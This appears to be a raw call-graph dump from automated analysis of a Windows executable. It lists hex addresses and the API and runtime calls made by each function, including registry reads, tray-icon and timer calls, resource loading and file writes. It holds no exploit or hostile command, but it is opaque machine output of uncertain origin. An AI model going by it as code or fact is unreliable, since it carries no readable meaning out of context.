95848->95832 95870 d5aec9 95849->95870 95851 d54c78 95851->95711 95853 d56b67 _wcslen 95852->95853 95854 d94ba1 95852->95854 95857 d56ba2 95853->95857 95858 d56b7d 95853->95858 95877 d593b2 95854->95877 95856 d94baa 95856->95856 95860 d6fddb 22 API calls 95857->95860 95876 d56f34 22 API calls 95858->95876 95862 d56bae 95860->95862 95861 d56b85 __fread_nolock 95861->95711 95863 d6fe0b 22 API calls 95862->95863 95863->95861 95865 d5516e 95864->95865 95869 d5518f __fread_nolock 95864->95869 95868 d6fe0b 22 API calls 95865->95868 95866 d6fddb 22 API calls 95867 d551a2 95866->95867 95867->95718 95868->95869 95869->95866 95871 d5aedc 95870->95871 95875 d5aed9 __fread_nolock 95870->95875 95872 d6fddb 22 API calls 95871->95872 95873 d5aee7 95872->95873 95874 d6fe0b 22 API calls 95873->95874 95874->95875 95875->95851 95876->95861 95878 d593c0 95877->95878 95880 d593c9 __fread_nolock 95877->95880 95879 d5aec9 22 API calls 95878->95879 95878->95880 95879->95880 95880->95856 95882 d53a67 GetModuleFileNameW 95881->95882 95882->95725 95884 d91f50 __wsopen_s 95883->95884 95885 d53aaf GetFullPathNameW 95884->95885 95886 d53ace 95885->95886 95887 d53ae9 95885->95887 95889 d56b57 22 API calls 95886->95889 95897 d5a6c3 95887->95897 95890 d53ada 95889->95890 95893 d537a0 95890->95893 95894 d537ae 95893->95894 95895 d593b2 22 API calls 95894->95895 95896 d537c2 95895->95896 95896->95728 95898 d5a6d0 95897->95898 95899 d5a6dd 95897->95899 95898->95890 95900 d6fddb 22 API calls 95899->95900 95901 d5a6e7 95900->95901 95902 d6fe0b 22 API calls 95901->95902 95902->95898 95904 d54ec6 95903->95904 95905 d54ea8 GetProcAddress 95903->95905 95908 d7e5eb 95904->95908 95906 d54eb8 95905->95906 95906->95904 95907 d54ebf FreeLibrary 95906->95907 95907->95904 95941 d7e52a 95908->95941 95910 d54eea 95910->95740 95910->95741 95912 d54e8d 95911->95912 95913 d54e6e GetProcAddress 95911->95913 95916 d54f80 95912->95916 95914 d54e7e 95913->95914 95914->95912 95915 d54e86 FreeLibrary 95914->95915 95915->95912 95917 d6fe0b 22 API calls 95916->95917 95918 d54f95 95917->95918 96002 d55722 95918->96002 95920 d54fa1 __fread_nolock 95921 d550a5 95920->95921 95922 d93d1d 95920->95922 95932 d54fdc 95920->95932 96005 d542a2 CreateStreamOnHGlobal 95921->96005 96016 dc304d 74 API calls 95922->96016 95925 d93d22 95927 d5511f 64 API calls 95925->95927 95926 d550f5 40 API calls 95926->95932 95928 d93d45 95927->95928 95929 d550f5 40 API calls 95928->95929 95930 d5506e messages 95929->95930 95930->95749 95932->95925 95932->95926 95932->95930 96011 d5511f 95932->96011 95934 d55107 95933->95934 95935 d93d70 95933->95935 96038 d7e8c4 95934->96038 95938 dc28fe 96075 dc274e 95938->96075 95940 dc2919 95940->95756 95944 d7e536 CallCatchBlock 95941->95944 95942 d7e544 95966 d7f2d9 20 API calls __dosmaperr 95942->95966 95944->95942 95946 d7e574 95944->95946 95945 d7e549 95967 d827ec 26 API calls __wsopen_s 95945->95967 95948 d7e586 95946->95948 95949 d7e579 95946->95949 95958 d88061 95948->95958 95968 d7f2d9 20 API calls __dosmaperr 95949->95968 95952 d7e58f 95953 d7e595 95952->95953 95954 d7e5a2 95952->95954 95969 d7f2d9 20 API calls __dosmaperr 95953->95969 95970 d7e5d4 LeaveCriticalSection __fread_nolock 95954->95970 95956 d7e554 __wsopen_s 95956->95910 95959 d8806d CallCatchBlock 95958->95959 95971 d82f5e EnterCriticalSection 95959->95971 95961 d8807b 95972 d880fb 95961->95972 95965 d880ac __wsopen_s 95965->95952 95966->95945 95967->95956 95968->95956 95969->95956 95970->95956 95971->95961 95979 d8811e 95972->95979 95973 d88088 95985 d880b7 95973->95985 95974 d88177 95990 d84c7d 95974->95990 95978 d829c8 _free 20 API calls 95980 d88189 95978->95980 95979->95973 95979->95974 95988 d7918d EnterCriticalSection 95979->95988 95989 d791a1 LeaveCriticalSection 95979->95989 95980->95973 95997 d83405 11 API calls 2 library calls 95980->95997 95983 d881a8 95998 d7918d EnterCriticalSection 95983->95998 96001 d82fa6 LeaveCriticalSection 95985->96001 95987 d880be 95987->95965 95988->95979 95989->95979 95995 d84c8a __dosmaperr 95990->95995 95991 d84cca 96000 d7f2d9 20 API calls __dosmaperr 95991->96000 95992 d84cb5 RtlAllocateHeap 95993 d84cc8 95992->95993 95992->95995 95993->95978 95995->95991 95995->95992 95999 d74ead 7 API calls 2 library calls 95995->95999 95997->95983 95998->95973 95999->95995 96000->95993 96001->95987 96003 d6fddb 22 API calls 96002->96003 96004 d55734 96003->96004 96004->95920 96006 d542bc FindResourceExW 96005->96006 96010 d542d9 96005->96010 96007 d935ba LoadResource 96006->96007 96006->96010 96008 d935cf SizeofResource 96007->96008 96007->96010 96009 d935e3 LockResource 96008->96009 96008->96010 96009->96010 96010->95932 96012 d5512e 96011->96012 96015 d93d90 96011->96015 96017 d7ece3 96012->96017 96016->95925 96020 d7eaaa 96017->96020 96019 d5513c 96019->95932 96023 d7eab6 CallCatchBlock 96020->96023 96021 d7eac2 96033 d7f2d9 20 API calls __dosmaperr 96021->96033 96023->96021 96024 d7eae8 96023->96024 96035 d7918d EnterCriticalSection 96024->96035 96025 d7eac7 96034 d827ec 26 API calls __wsopen_s 96025->96034 96028 d7eaf4 96036 d7ec0a 62 API calls 2 library calls 96028->96036 96030 d7eb08 96037 d7eb27 LeaveCriticalSection __fread_nolock 96030->96037 96032 d7ead2 __wsopen_s 96032->96019 96033->96025 96034->96032 96035->96028 96036->96030 96037->96032 96041 d7e8e1 96038->96041 96040 d55118 96040->95938 96042 d7e8ed CallCatchBlock 96041->96042 96043 d7e92d 96042->96043 96044 d7e925 __wsopen_s 96042->96044 96047 d7e900 ___scrt_fastfail 96042->96047 96054 d7918d EnterCriticalSection 96043->96054 96044->96040 96046 d7e937 96055 d7e6f8 96046->96055 96068 d7f2d9 20 API calls __dosmaperr 96047->96068 96050 d7e91a 96069 d827ec 26 API calls __wsopen_s 96050->96069 96054->96046 96058 d7e70a ___scrt_fastfail 96055->96058 96061 d7e727 96055->96061 96056 d7e717 96071 d7f2d9 20 API calls __dosmaperr 96056->96071 96058->96056 96058->96061 96063 d7e76a __fread_nolock 96058->96063 96059 d7e71c 96072 d827ec 26 API calls __wsopen_s 96059->96072 96070 d7e96c LeaveCriticalSection __fread_nolock 96061->96070 96062 d7e886 ___scrt_fastfail 96074 d7f2d9 20 API calls __dosmaperr 96062->96074 96063->96061 96063->96062 96065 d7d955 __fread_nolock 26 API calls 96063->96065 96067 d88d45 __fread_nolock 38 API calls 96063->96067 96073 d7cf78 26 API calls 4 library calls 96063->96073 96065->96063 96067->96063 96068->96050 96069->96044 96070->96044 96071->96059 96072->96061 96073->96063 96074->96059 96078 d7e4e8 96075->96078 96077 dc275d 96077->95940 96081 d7e469 96078->96081 96080 d7e505 96080->96077 96082 d7e48c 96081->96082 96083 d7e478 96081->96083 96088 d7e488 __alldvrm 96082->96088 96091 d8333f 11 API calls 2 library calls 96082->96091 96089 d7f2d9 20 API calls __dosmaperr 96083->96089 96086 d7e47d 96090 d827ec 26 API calls __wsopen_s 96086->96090 96088->96080 96089->96086 96090->96088 96091->96088 96097 dc2e7a 96092->96097 96093 d550f5 40 API calls 96093->96097 96094 dc2d3b 96094->95783 96094->95801 96095 dc28fe 27 API calls 96095->96097 96096 d5511f 64 API calls 96096->96097 96097->96093 96097->96094 96097->96095 96097->96096 96099 dc22e7 96098->96099 96100 dc22d9 96098->96100 96102 dc232c 96099->96102 96103 d7e5eb 29 API calls 96099->96103 96126 dc22f0 96099->96126 96101 d7e5eb 29 API calls 96100->96101 96101->96099 96127 dc2557 96102->96127 96104 dc2311 96103->96104 96104->96102 96106 dc231a 96104->96106 96110 d7e678 67 API calls 96106->96110 96106->96126 96107 dc2370 96108 dc2374 96107->96108 96109 dc2395 96107->96109 96112 dc2381 96108->96112 96114 d7e678 67 API calls 96108->96114 96131 dc2171 96109->96131 96110->96126 96115 d7e678 67 API calls 96112->96115 96112->96126 96113 dc239d 96116 dc23c3 96113->96116 96117 dc23a3 96113->96117 96114->96112 96115->96126 96138 dc23f3 96116->96138 96119 dc23b0 96117->96119 96120 d7e678 67 API calls 96117->96120 96121 d7e678 67 API calls 96119->96121 96119->96126 96120->96119 96121->96126 96122 dc23de 96125 d7e678 67 API calls 96122->96125 96122->96126 96123 dc23ca 96123->96122 96146 d7e678 96123->96146 96125->96126 96126->95801 96128 dc257c 96127->96128 96130 dc2565 __fread_nolock 96127->96130 96129 d7e8c4 __fread_nolock 40 API calls 96128->96129 96129->96130 96130->96107 96132 d7ea0c ___std_exception_copy 21 API calls 96131->96132 96133 dc217f 96132->96133 96134 d7ea0c ___std_exception_copy 21 API calls 96133->96134 96135 dc2190 96134->96135 96136 d7ea0c ___std_exception_copy 21 API calls 96135->96136 96137 dc219c 96136->96137 96137->96113 96142 dc2408 96138->96142 96139 dc24c0 96163 dc2724 96139->96163 96141 dc21cc 40 API calls 96141->96142 96142->96139 96142->96141 96145 dc24c7 96142->96145 96159 dc2606 96142->96159 96167 dc2269 40 API calls 96142->96167 96145->96123 96147 d7e684 CallCatchBlock 96146->96147 96148 d7e695 96147->96148 96149 d7e6aa 96147->96149 96241 d7f2d9 20 API calls __dosmaperr 96148->96241 96158 d7e6a5 __wsopen_s 96149->96158 96224 d7918d EnterCriticalSection 96149->96224 96151 d7e69a 96242 d827ec 26 API calls __wsopen_s 96151->96242 96154 d7e6c6 96225 d7e602 96154->96225 96156 d7e6d1 96243 d7e6ee LeaveCriticalSection __fread_nolock 96156->96243 96158->96122 96161 dc261d 96159->96161 96162 dc2617 96159->96162 96161->96142 96161->96161 96162->96161 96168 dc26d7 96162->96168 96164 dc2731 96163->96164 96166 dc2742 96163->96166 96165 d7dbb3 65 API calls 96164->96165 96165->96166 96166->96145 96167->96142 96169 dc2714 96168->96169 96170 dc2703 96168->96170 96169->96162 96172 d7dbb3 96170->96172 96173 d7dbc1 96172->96173 96174 d7dbdd 96172->96174 96173->96174 96175 d7dbe3 96173->96175 96176 d7dbcd 96173->96176 96174->96169 96181 d7d9cc 96175->96181 96184 d7f2d9 20 API calls __dosmaperr 96176->96184 96179 d7dbd2 96185 d827ec 26 API calls __wsopen_s 96179->96185 96186 d7d97b 96181->96186 96183 d7d9f0 96183->96174 96184->96179 96185->96174 96187 d7d987 CallCatchBlock 96186->96187 96194 d7918d EnterCriticalSection 96187->96194 96189 d7d995 96195 d7d9f4 96189->96195 96193 d7d9b3 __wsopen_s 96193->96183 96194->96189 96203 d849a1 96195->96203 96201 d7d9a2 96202 d7d9c0 LeaveCriticalSection __fread_nolock 96201->96202 96202->96193 96204 d7d955 __fread_nolock 26 API calls 96203->96204 96205 d849b0 96204->96205 96206 d8f89b __fread_nolock 26 API calls 96205->96206 96207 d849b6 96206->96207 96208 d83820 _strftime 21 API calls 96207->96208 96211 d7da09 96207->96211 96209 d84a15 96208->96209 96210 d829c8 _free 20 API calls 96209->96210 96210->96211 96212 d7da3a 96211->96212 96214 d7da4c 96212->96214 96218 d7da24 96212->96218 96213 d7da5a 96215 d7f2d9 _free 20 API calls 96213->96215 96214->96213 96214->96218 96222 d7da85 __fread_nolock 96214->96222 96216 d7da5f 96215->96216 96217 d827ec __wsopen_s 26 API calls 96216->96217 96217->96218 96223 d84a56 62 API calls 96218->96223 96219 d7dc0b 62 API calls 96219->96222 96220 d7d955 __fread_nolock 26 API calls 96220->96222 96221 d859be __wsopen_s 62 API calls 96221->96222 96222->96218 96222->96219 96222->96220 96222->96221 96223->96201 96224->96154 96226 d7e60f 96225->96226 96228 d7e624 96225->96228 96269 d7f2d9 20 API calls __dosmaperr 96226->96269 96233 d7e61f 96228->96233 96244 d7dc0b 96228->96244 96229 d7e614 96270 d827ec 26 API calls __wsopen_s 96229->96270 96233->96156 96236 d7d955 __fread_nolock 26 API calls 96237 d7e646 96236->96237 96254 d8862f 96237->96254 96240 d829c8 _free 20 API calls 96240->96233 96241->96151 96242->96158 96243->96158 96245 d7dc23 96244->96245 96249 d7dc1f 96244->96249 96246 d7d955 __fread_nolock 26 API calls 96245->96246 96245->96249 96247 d7dc43 96246->96247 96271 d859be 96247->96271 96250 d84d7a 96249->96250 96251 d84d90 96250->96251 96252 d7e640 96250->96252 96251->96252 96253 d829c8 _free 20 API calls 96251->96253 96252->96236 96253->96252 96255 d8863e 96254->96255 96256 d88653 96254->96256 96394 d7f2c6 20 API calls __dosmaperr 96255->96394 96258 d8868e 96256->96258 96262 d8867a 96256->96262 96396 d7f2c6 20 API calls __dosmaperr 96258->96396 96259 d88643 96395 d7f2d9 20 API calls __dosmaperr 96259->96395 96391 d88607 96262->96391 96263 d88693 96397 d7f2d9 20 API calls __dosmaperr 96263->96397 96266 d8869b 96398 d827ec 26 API calls __wsopen_s 96266->96398 96267 d7e64c 96267->96233 96267->96240 96269->96229 96270->96233 96272 d859ca CallCatchBlock 96271->96272 96273 d859ea 96272->96273 96274 d859d2 96272->96274 96276 d85a88 96273->96276 96281 d85a1f 96273->96281 96350 d7f2c6 20 API calls __dosmaperr 96274->96350 96355 d7f2c6 20 API calls __dosmaperr 96276->96355 96277 d859d7 96351 d7f2d9 20 API calls __dosmaperr 96277->96351 96280 d85a8d 96356 d7f2d9 20 API calls __dosmaperr 96280->96356 96296 d85147 EnterCriticalSection 96281->96296 96282 d859df __wsopen_s 96282->96249 96285 d85a95 96357 d827ec 26 API calls __wsopen_s 96285->96357 96286 d85a25 96288 d85a41 96286->96288 96289 d85a56 96286->96289 96352 d7f2d9 20 API calls __dosmaperr 96288->96352 96297 d85aa9 96289->96297 96292 d85a46 96353 d7f2c6 20 API calls __dosmaperr 96292->96353 96293 d85a51 96354 d85a80 LeaveCriticalSection __wsopen_s 96293->96354 96296->96286 96298 d85ad7 96297->96298 96335 d85ad0 96297->96335 96299 d85afa 96298->96299 96300 d85adb 96298->96300 96303 d85b4b 96299->96303 96304 d85b2e 96299->96304 96365 d7f2c6 20 API calls __dosmaperr 96300->96365 96307 d85b61 96303->96307 96371 d89424 28 API calls __wsopen_s 96303->96371 96368 d7f2c6 20 API calls __dosmaperr 96304->96368 96305 d85cb1 96305->96293 96306 d85ae0 96366 d7f2d9 20 API calls __dosmaperr 96306->96366 96358 d8564e 96307->96358 96311 d85ae7 96367 d827ec 26 API calls __wsopen_s 96311->96367 96313 d85b33 96369 d7f2d9 20 API calls __dosmaperr 96313->96369 96317 d85ba8 96320 d85bbc 96317->96320 96321 d85c02 WriteFile 96317->96321 96318 d85b6f 96322 d85b73 96318->96322 96323 d85b95 96318->96323 96319 d85b3b 96370 d827ec 26 API calls __wsopen_s 96319->96370 96325 d85bf2 96320->96325 96326 d85bc4 96320->96326 96328 d85c25 GetLastError 96321->96328 96334 d85b8b 96321->96334 96327 d85c69 96322->96327 96372 d855e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 96322->96372 96373 d8542e 45 API calls 3 library calls 96323->96373 96376 d856c4 7 API calls 2 library calls 96325->96376 96330 d85bc9 96326->96330 96331 d85be2 96326->96331 96327->96335 96380 d7f2d9 20 API calls __dosmaperr 96327->96380 96328->96334 96330->96327 96336 d85bd2 96330->96336 96375 d85891 8 API calls 2 library calls 96331->96375 96334->96327 96334->96335 96341 d85c45 96334->96341 96382 d70a8c 96335->96382 96374 d857a3 7 API calls 2 library calls 96336->96374 96338 d85be0 96338->96334 96340 d85c8e 96381 d7f2c6 20 API calls __dosmaperr 96340->96381 96344 d85c4c 96341->96344 96345 d85c60 96341->96345 96377 d7f2d9 20 API calls __dosmaperr 96344->96377 96379 d7f2a3 20 API calls 2 library calls 96345->96379 96348 d85c51 96378 d7f2c6 20 API calls __dosmaperr 96348->96378 96350->96277 96351->96282 96352->96292 96353->96293 96354->96282 96355->96280 96356->96285 96357->96282 96359 d8f89b __fread_nolock 26 API calls 96358->96359 96361 d8565e 96359->96361 96360 d85663 96360->96317 96360->96318 96361->96360 96389 d82d74 38 API calls 3 library calls 96361->96389 96363 d85686 96363->96360 96364 d856a4 GetConsoleMode 96363->96364 96364->96360 96365->96306 96366->96311 96367->96335 96368->96313 96369->96319 96370->96335 96371->96307 96372->96334 96373->96334 96374->96338 96375->96338 96376->96338 96377->96348 96378->96335 96379->96335 96380->96340 96381->96335 96383 d70a97 IsProcessorFeaturePresent 96382->96383 96384 d70a95 96382->96384 96386 d70c5d 96383->96386 96384->96305 96390 d70c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96386->96390 96388 d70d40 96388->96305 96389->96363 96390->96388 96399 d88585 96391->96399 96393 d8862b 96393->96267 96394->96259 96395->96267 96396->96263 96397->96266 96398->96267 96400 d88591 CallCatchBlock 96399->96400 96410 d85147 EnterCriticalSection 96400->96410 96402 d8859f 96403 d885d1 96402->96403 96404 d885c6 96402->96404 96426 d7f2d9 20 API calls __dosmaperr 96403->96426 96411 d886ae 96404->96411 96407 d885cc 96427 d885fb LeaveCriticalSection __wsopen_s 96407->96427 96409 d885ee __wsopen_s 96409->96393 96410->96402 96428 d853c4 96411->96428 96413 d886c4 96441 d85333 21 API calls 3 library calls 96413->96441 96414 d886be 96414->96413 96416 d886f6 96414->96416 96417 d853c4 __wsopen_s 26 API calls 96414->96417 96416->96413 96418 d853c4 __wsopen_s 26 API calls 96416->96418 96420 d886ed 96417->96420 96421 d88702 CloseHandle 96418->96421 96419 d8871c 96422 d8873e 96419->96422 96442 d7f2a3 20 API calls 2 library calls 96419->96442 96423 d853c4 __wsopen_s 26 API calls 96420->96423 96421->96413 96424 d8870e GetLastError 96421->96424 96422->96407 96423->96416 96424->96413 96426->96407 96427->96409 96429 d853d1 96428->96429 96430 d853e6 96428->96430 96443 d7f2c6 20 API calls __dosmaperr 96429->96443 96435 d8540b 96430->96435 96445 d7f2c6 20 API calls __dosmaperr 96430->96445 96433 d853d6 96444 d7f2d9 20 API calls __dosmaperr 96433->96444 96435->96414 96436 d85416 96446 d7f2d9 20 API calls __dosmaperr 96436->96446 96437 d853de 96437->96414 96439 d8541e 96447 d827ec 26 API calls __wsopen_s 96439->96447 96441->96419 96442->96422 96443->96433 96444->96437 96445->96436 96446->96439 96447->96437 96448 d53156 96451 d53170 96448->96451 96452 d53187 96451->96452 96453 d5318c 96452->96453 96454 d531eb 96452->96454 96490 d531e9 96452->96490 96458 d53265 PostQuitMessage 96453->96458 96459 d53199 96453->96459 96456 d92dfb 96454->96456 96457 d531f1 96454->96457 96455 d531d0 DefWindowProcW 96492 d5316a 96455->96492 96507 d518e2 10 API calls 96456->96507 96460 d5321d SetTimer RegisterWindowMessageW 96457->96460 96461 d531f8 96457->96461 96458->96492 96463 d531a4 96459->96463 96464 d92e7c 96459->96464 96468 d53246 CreatePopupMenu 96460->96468 96460->96492 96465 d53201 KillTimer 96461->96465 96466 d92d9c 96461->96466 96469 d92e68 96463->96469 96470 d531ae 96463->96470 96521 dbbf30 34 API calls ___scrt_fastfail 96464->96521 96503 d530f2 Shell_NotifyIconW ___scrt_fastfail 96465->96503 96472 d92da1 96466->96472 96473 d92dd7 MoveWindow 96466->96473 96467 d92e1c 96508 d6e499 42 API calls 96467->96508 96468->96492 96496 dbc161 96469->96496 96477 d92e4d 96470->96477 96478 d531b9 96470->96478 96479 d92da7 96472->96479 96480 d92dc6 SetFocus 96472->96480 96473->96492 96477->96455 96520 db0ad7 22 API calls 96477->96520 96482 d53253 96478->96482 96488 d531c4 96478->96488 96484 d92db0 96479->96484 96479->96488 96480->96492 96481 d53214 96504 d53c50 DeleteObject DestroyWindow 96481->96504 96505 d5326f 44 API calls ___scrt_fastfail 96482->96505 96483 d92e8e 96483->96455 96483->96492 96506 d518e2 10 API calls 96484->96506 96488->96455 96509 d530f2 Shell_NotifyIconW ___scrt_fastfail 96488->96509 96490->96455 96491 d53263 96491->96492 96494 d92e41 96510 d53837 96494->96510 96497 dbc179 ___scrt_fastfail 96496->96497 96498 dbc276 96496->96498 96522 d53923 96497->96522 96498->96492 96500 dbc25f KillTimer SetTimer 96500->96498 96501 dbc1a0 96501->96500 96502 dbc251 Shell_NotifyIconW 96501->96502 96502->96500 96503->96481 96504->96492 96505->96491 96506->96492 96507->96467 96508->96488 96509->96494 96511 d53862 ___scrt_fastfail 96510->96511 96593 d54212 96511->96593 96514 d538e8 96516 d53906 Shell_NotifyIconW 96514->96516 96517 d93386 Shell_NotifyIconW 96514->96517 96518 d53923 24 API calls 96516->96518 96519 d5391c 96518->96519 96519->96490 96520->96490 96521->96483 96523 d53a13 96522->96523 96524 d5393f 96522->96524 96523->96501 96544 d56270 96524->96544 96527 d93393 LoadStringW 96530 d933ad 96527->96530 96528 d5395a 96529 d56b57 22 API calls 96528->96529 96531 d5396f 96529->96531 96534 d5a8c7 22 API calls 96530->96534 96538 d53994 ___scrt_fastfail 96530->96538 96532 d933c9 96531->96532 96533 d5397c 96531->96533 96536 d56350 22 API calls 96532->96536 96533->96530 96535 d53986 96533->96535 96534->96538 96549 d56350 96535->96549 96539 d933d7 96536->96539 96541 d539f9 Shell_NotifyIconW 96538->96541 96539->96538 96558 d533c6 96539->96558 96541->96523 96542 d933f9 96543 d533c6 22 API calls 96542->96543 96543->96538 96545 d6fe0b 22 API calls 96544->96545 96546 d56295 96545->96546 96547 d6fddb 22 API calls 96546->96547 96548 d5394d 96547->96548 96548->96527 96548->96528 96550 d56362 96549->96550 96551 d94a51 96549->96551 96567 d56373 96550->96567 96577 d54a88 22 API calls __fread_nolock 96551->96577 96554 d5636e 96554->96538 96555 d94a5b 96556 d94a67 96555->96556 96557 d5a8c7 22 API calls 96555->96557 96557->96556 96559 d930bb 96558->96559 96560 d533dd 96558->96560 96562 d6fddb 22 API calls 96559->96562 96583 d533ee 96560->96583 96564 d930c5 _wcslen 96562->96564 96563 d533e8 96563->96542 96565 d6fe0b 22 API calls 96564->96565 96566 d930fe __fread_nolock 96565->96566 96568 d563b6 __fread_nolock 96567->96568 96569 d56382 96567->96569 96568->96554 96569->96568 96570 d94a82 96569->96570 96571 d563a9 96569->96571 96573 d6fddb 22 API calls 96570->96573 96578 d5a587 96571->96578 96574 d94a91 96573->96574 96575 d6fe0b 22 API calls 96574->96575 96576 d94ac5 __fread_nolock 96575->96576 96577->96555 96579 d5a59d 96578->96579 96582 d5a598 __fread_nolock 96578->96582 96580 d9f80f 96579->96580 96581 d6fe0b 22 API calls 96579->96581 96581->96582 96582->96568 96584 d533fe _wcslen 96583->96584 96585 d9311d 96584->96585 96586 d53411 96584->96586 96588 d6fddb 22 API calls 96585->96588 96587 d5a587 22 API calls 96586->96587 96589 d5341e __fread_nolock 96587->96589 96590 d93127 96588->96590 96589->96563 96591 d6fe0b 22 API calls 96590->96591 96592 d93157 __fread_nolock 96591->96592 96594 d538b7 96593->96594 96595 d935a4 96593->96595 96594->96514 96597 dbc874 42 API calls _strftime 96594->96597 96595->96594 96596 d935ad DestroyIcon 96595->96596 96596->96594 96597->96514 96598 d51033 96603 d54c91 96598->96603 96602 d51042 96604 d5a961 22 API calls 96603->96604 96605 d54cff 96604->96605 96611 d53af0 96605->96611 96608 d54d9c 96609 d51038 96608->96609 96614 d551f7 22 API calls __fread_nolock 96608->96614 96610 d700a3 29 API calls __onexit 96609->96610 96610->96602 96615 d53b1c 96611->96615 96614->96608 96616 d53b0f 96615->96616 96617 d53b29 96615->96617 96616->96608 96617->96616 96618 d53b30 RegOpenKeyExW 96617->96618 96618->96616 96619 d53b4a RegQueryValueExW 96618->96619 96620 d53b80 RegCloseKey 96619->96620 96621 d53b6b 96619->96621 96620->96616 96621->96620 96622 d5f7bf 96623 d5fcb6 96622->96623 96624 d5f7d3 96622->96624 96712 d5aceb 23 API calls messages 96623->96712 96626 d5fcc2 96624->96626 96627 d6fddb 22 API calls 96624->96627 96713 d5aceb 23 API calls messages 96626->96713 96629 d5f7e5 96627->96629 96629->96626 96630 d5fd3d 96629->96630 96631 d5f83e 96629->96631 96714 dc1155 22 API calls 96630->96714 96648 d5ed9d messages 96631->96648 96657 d61310 96631->96657 96634 d6fddb 22 API calls 96655 d5ec76 messages 96634->96655 96635 d5fef7 96640 d5a8c7 22 API calls 96635->96640 96635->96648 96638 da4600 96643 d5a8c7 22 API calls 96638->96643 96638->96648 96639 da4b0b 96716 dc359c 82 API calls __wsopen_s 96639->96716 96640->96648 96643->96648 96645 d5a8c7 22 API calls 96645->96655 96646 d70242 EnterCriticalSection LeaveCriticalSection LeaveCriticalSection WaitForSingleObjectEx EnterCriticalSection 96646->96655 96647 d5fbe3 96647->96648 96650 da4bdc 96647->96650 96656 d5f3ae messages 96647->96656 96649 d5a961 22 API calls 96649->96655 96717 dc359c 82 API calls __wsopen_s 96650->96717 96652 da4beb 96718 dc359c 82 API calls __wsopen_s 96652->96718 96653 d701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent __Init_thread_footer 96653->96655 96654 d700a3 29 API calls pre_c_initialization 96654->96655 96655->96634 96655->96635 96655->96638 96655->96639 96655->96645 96655->96646 96655->96647 96655->96648 96655->96649 96655->96652 96655->96653 96655->96654 96655->96656 96710 d601e0 235 API calls 2 library calls 96655->96710 96711 d606a0 41 API calls messages 96655->96711 96656->96648 96715 dc359c 82 API calls __wsopen_s 96656->96715 96658 d61376 96657->96658 96659 d617b0 96657->96659 96660 da6331 96658->96660 96663 d61940 9 API calls 96658->96663 96852 d70242 5 API calls __Init_thread_wait 96659->96852 96857 dd709c 235 API calls 96660->96857 96666 d613a0 96663->96666 96664 d617ba 96667 d617fb 96664->96667 96669 d59cb3 22 API calls 96664->96669 96665 da633d 96665->96655 96668 d61940 9 API calls 96666->96668 96671 da6346 96667->96671 96673 d6182c 96667->96673 96670 d613b6 96668->96670 96676 d617d4 96669->96676 96670->96667 96672 d613ec 96670->96672 96858 dc359c 82 API calls __wsopen_s 96671->96858 96672->96671 96679 d61408 __fread_nolock 96672->96679 96854 d5aceb 23 API calls messages 96673->96854 96853 d701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96676->96853 96677 d61839 96855 d6d217 235 API calls 96677->96855 96679->96677 96681 da636e 96679->96681 96689 d6fddb 22 API calls 96679->96689 96690 d6fe0b 22 API calls 96679->96690 96696 d6152f 96679->96696 96698 da63b2 96679->96698 96703 d615c7 messages 96679->96703 96827 d5ec40 96679->96827 96859 dc359c 82 API calls __wsopen_s 96681->96859 96683 d61872 96683->96660 96856 d6faeb 23 API calls 96683->96856 96684 d6153c 96687 d61940 9 API calls 96684->96687 96685 da63d1 96861 dd5745 54 API calls _wcslen 96685->96861 96688 d61549 96687->96688 96693 d61940 9 API calls 96688->96693 96688->96703 96689->96679 96690->96679 96691 d6171d 96691->96655 96700 d61563 96693->96700 96696->96684 96696->96685 96860 dc359c 82 API calls __wsopen_s 96698->96860 96700->96703 96704 d5a8c7 22 API calls 96700->96704 96702 d6167b messages 96702->96691 96851 d6ce17 22 API calls messages 96702->96851 96703->96683 96703->96702 96719 d61940 96703->96719 96729 dd959f 96703->96729 96732 dc6ef1 96703->96732 96812 dcf0ec 96703->96812 96821 dbd4ce 96703->96821 96824 dd958b 96703->96824 96862 dc359c 82 API calls __wsopen_s 96703->96862 96704->96703 96710->96655 96711->96655 96712->96626 96713->96630 96714->96648 96715->96648 96716->96648 96717->96652 96718->96648 96720 d61981 96719->96720 96723 d6195d 96719->96723 96863 d70242 5 API calls __Init_thread_wait 96720->96863 96728 d6196e 96723->96728 96865 d70242 5 API calls __Init_thread_wait 96723->96865 96724 d6198b 96724->96723 96864 d701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96724->96864 96725 d68727 96725->96728 96866 d701f8 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 96725->96866 96728->96703 96867 dd7f59 96729->96867 96731 dd95af 96731->96703 96733 d5a961 22 API calls 96732->96733 96734 dc6f1d 96733->96734 96735 d5a961 22 API calls 96734->96735 96736 dc6f26 96735->96736 96737 dc6f3a 96736->96737 97151 d5b567 39 API calls 96736->97151 96739 d57510 53 API calls 96737->96739 96740 dc6f57 _wcslen 96739->96740 96741 dc6fbc 96740->96741 96742 dc70bf 96740->96742 96754 dc70e9 96740->96754 96744 d57510 53 API calls 96741->96744 96743 d54ecb 94 API calls 96742->96743 96745 dc70d0 96743->96745 96746 dc6fc8 96744->96746 96747 dc70e5 96745->96747 96748 d54ecb 94 API calls 96745->96748 96750 d5a8c7 22 API calls 96746->96750 96752 dc6fdb 96746->96752 96749 d5a961 22 API calls 96747->96749 96747->96754 96748->96747 96751 dc711a 96749->96751 96750->96752 96755 d5a961 22 API calls 96751->96755 96753 dc7027 96752->96753 96756 dc7005 96752->96756 96760 d5a8c7 22 API calls 96752->96760 96757 d57510 53 API calls 96753->96757 96754->96703 96758 dc7126 96755->96758 96761 d533c6 22 API calls 96756->96761 96762 dc7034 96757->96762 96759 d5a961 22 API calls 96758->96759 96763 dc712f 96759->96763 96760->96756 96764 dc700f 96761->96764 96765 dc703d 96762->96765 96766 dc7047 96762->96766 96768 d5a961 22 API calls 96763->96768 96769 d57510 53 API calls 96764->96769 96770 d5a8c7 22 API calls 96765->96770 97152 dbe199 GetFileAttributesW 96766->97152 96772 dc7138 96768->96772 96773 dc701b 96769->96773 96770->96766 96771 dc7050 96774 dc7063 96771->96774 96777 d54c6d 22 API calls 96771->96777 96775 d57510 53 API calls 96772->96775 96776 d56350 22 API calls 96773->96776 96779 d57510 53 API calls 96774->96779 96785 dc7069 96774->96785 96778 dc7145 96775->96778 96776->96753 96777->96774 97000 d5525f 96778->97000 96781 dc70a0 96779->96781 97153 dbd076 